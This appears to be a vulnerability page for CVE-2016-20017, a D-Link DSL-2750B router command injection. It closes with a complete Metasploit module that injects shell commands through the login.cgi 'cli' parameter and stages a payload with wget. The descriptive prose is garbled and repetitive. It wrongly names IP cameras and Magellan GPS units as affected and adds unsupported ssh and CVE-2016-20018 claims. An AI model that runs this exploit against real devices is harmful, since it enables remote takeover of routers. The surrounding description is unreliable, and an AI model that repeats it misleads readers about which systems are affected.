CVE-2016-20017 The D-Link DSL-2750B devices before 1.05 are vulnerable to remote command injection. In 2016-2018, this was exploited in the wild.
This issue is due to the fact that the login.cgi script accepts unauthenticated input via the cli parameter passed on the command line. In addition to accepting the cli parameter, the device also permits access to the CGI via http, which allows remote attackers to issue arbitrary commands. These unauthenticated commands can be exploited to cause remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the login.cgi script does not require authentication for all remote commands. However, these attacks are possible because the login.cgi script does not require authentication for all remote commands. Existing proof-of-concept scripts for these devices demonstrate how the login.cgi script can be used to access other administrative functions. In addition to the login.cgi script, these devices also permit remote attackers to access the device via ssh, which may be exploited for unauthenticated command execution. SSH access can be enabled as a part of setting up new devices or as a maintenance function. This issue is due to the fact that the login.cgi script accepts unauthenticated input via the cli parameter passed on the command line. In addition to accepting the cli parameter, the device also permits access to the CGI via http, which allows remote attackers to issue arbitrary commands
Vulnerability overview
This vulnerability affects multiple models of D-Link IP Cameras. This issue is due to the fact that the login.cgi script accepts unauthenticated input via the cli parameter passed on the command line. In addition to accepting the cli parameter, the device also permits access to the CGI via http, which allows remote attackers to issue arbitrary commands. These unauthenticated commands can be exploited to cause remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the login.cgi script does not require authentication for all remote commands. However, these attacks are possible because the login.cgi script does not require authentication for all remote commands.
Vulnerable Devices
The following devices are vulnerable to CVE-2016-20017:
Magellan RoadMate RM 1055
Magellan RoadMate RM 1255
CVE-2016-20018
This issue is due to the fact that the web.cgi script accepts unauthenticated input via the cli parameter passed on the command line. In addition to accepting the cli parameter, the device also permits access to the CGI via http, which allows remote attackers to issue arbitrary commands. These unauthenticated commands can be exploited to cause remote code execution. In certain vulnerable versions of the firmware, access to the remote CGI also allows unauthenticated command injection. These devices are prone to code injection attacks because the web.cgi script does not require authentication for all remote commands. However, these attacks are possible because the web.cgi script does not require authentication for all remote commands. Existing proof-of-concept scripts for these devices demonstrate how the web.cgi script can be used to access other administrative functions in addition to performing HTTP GET requests against other parts of the device's configuration or running a custom application on it such as a webserver or database server
Exploit
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DSL-2750B OS Command Injection',
'Description' => %q(
This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
Vulnerability can be exploited through "cli" parameter that is directly used to invoke
"ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
),
'Author' =>
[
'p@ql', # vulnerability discovery
'Marcin Bury <marcin[at]threat9.com>' # metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['PACKETSTORM', 135706],
['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
['URL', 'http://www.quantumleap.it/d-link-router-dsl-2750b-firmware-1-01-1-03-rce-no-auth/']
],
'Targets' =>
[
[
'Linux mipsbe Payload',
{
'Arch' => ARCH_MIPSBE,
'Platform' => 'linux'
}
],
[
'Linux mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
]
],
'DisclosureDate' => 'Feb 5 2016',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::FLAVOR')
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/ayefeaturesconvert.js'
)
unless res
vprint_error('Connection failed')
return CheckCode::Unknown
end
unless res.code.to_i == 200 && res.body.include?('DSL-2750')
vprint_status('Remote host is not a DSL-2750')
return CheckCode::Safe
end
if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
version = Regexp.last_match[1]
vprint_status("Remote host is a DSL-2750B with firmware version #{version}")
if version >= "1.01" && version <= "1.03"
return Exploit::CheckCode::Appears
end
end
CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error('Connection failed')
return CheckCode::Unknown
end
def execute_command(cmd, _opts)
payload = Rex::Text.uri_encode("multilingual show';#{cmd}'")
send_request_cgi(
{
'method' => 'GET',
'uri' => '/login.cgi',
'vars_get' => {
'cli' => "#{payload}$"
},
'encode_params' => false
},
5
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} Failed to connect to the web server")
end
def exploit
print_status("#{peer} Checking target version...")
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
end
execute_cmdstager(
flavor: :wget,
linemax: 200
)
end
end
Timeline
Published on: 10/19/2022 05:15:00 UTC
Last modified on: 10/21/2022 20:19:00 UTC